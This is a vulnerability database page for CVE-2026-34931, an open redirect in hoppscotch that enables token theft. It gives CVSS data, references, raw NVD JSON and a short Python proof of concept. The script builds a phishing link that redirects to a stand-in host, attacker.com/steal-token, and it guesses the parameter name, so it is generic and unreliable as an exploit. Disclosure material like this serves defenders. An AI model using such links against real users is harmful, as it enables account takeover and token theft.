CVE-2026-34931

Description

hoppscotch is an open source API development ecosystem. Prior to version 2026.3.0, there is an open redirect vulnerability that leads to token exfiltration. With these tokens, the attacker can sign in as the victim to takeover their account. This issue has been patched in version 2026.3.0.

CVSS Details

CVSS Score

9.6

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:hoppscotch:hoppscotch:*:*:*:*:*:*:*:* - VULNERABLE

Hoppscotch < 2026.3.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2026-34931 (Open Redirect)
# This script demonstrates how to craft a malicious URL to exploit the open redirect vulnerability.

import urllib.parse

def craft_exploit_url(base_url, malicious_url):
    """
    Constructs a URL that exploits the open redirect vulnerability.
    Replace 'redirect' with the actual vulnerable parameter if different.
    """
    # The vulnerable endpoint often accepts a 'redirect' or 'next' parameter
    params = {'redirect': malicious_url}
    query_string = urllib.parse.urlencode(params)
    exploit_url = f"{base_url}?{query_string}"
    return exploit_url

if __name__ == "__main__":
    target = "https://hoppscotch.io"  # Example target instance
    evil_site = "https://attacker.com/steal-token"
    
    url = craft_exploit_url(target, evil_site)
    print(f"[+] Send this link to the victim: {url}")
    print("[+] When the victim clicks, their token may be sent to the attacker.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34931
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34931
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34931/
[4] VulDB https://vuldb.com/cve/CVE-2026-34931
[5] https://github.com/hoppscotch/hoppscotch/releases/tag/2026.3.0
[6] https://github.com/hoppscotch/hoppscotch/security/advisories/GHSA-7fg7-wx5q-6m3v

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34931", "sourceIdentifier": "[email protected]", "published": "2026-04-02T20:16:28.830", "lastModified": "2026-04-15T17:24:29.680", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "hoppscotch is an open source API development ecosystem. Prior to version 2026.3.0, there is an open redirect vulnerability that leads to token exfiltration. With these tokens, the attacker can sign in as the victim to takeover their account. This issue has been patched in version 2026.3.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-601"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hoppscotch:hoppscotch:*:*:*:*:*:*:*:*", "versionEndExcluding": "2026.3.0", "matchCriteriaId": "0FF217CC-EE39-4462-91B1-AA13EDECFF36"}]}]}], "references": [{"url": "https://github.com/hoppscotch/hoppscotch/releases/tag/2026.3.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/hoppscotch/hoppscotch/security/advisories/GHSA-7fg7-wx5q-6m3v", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}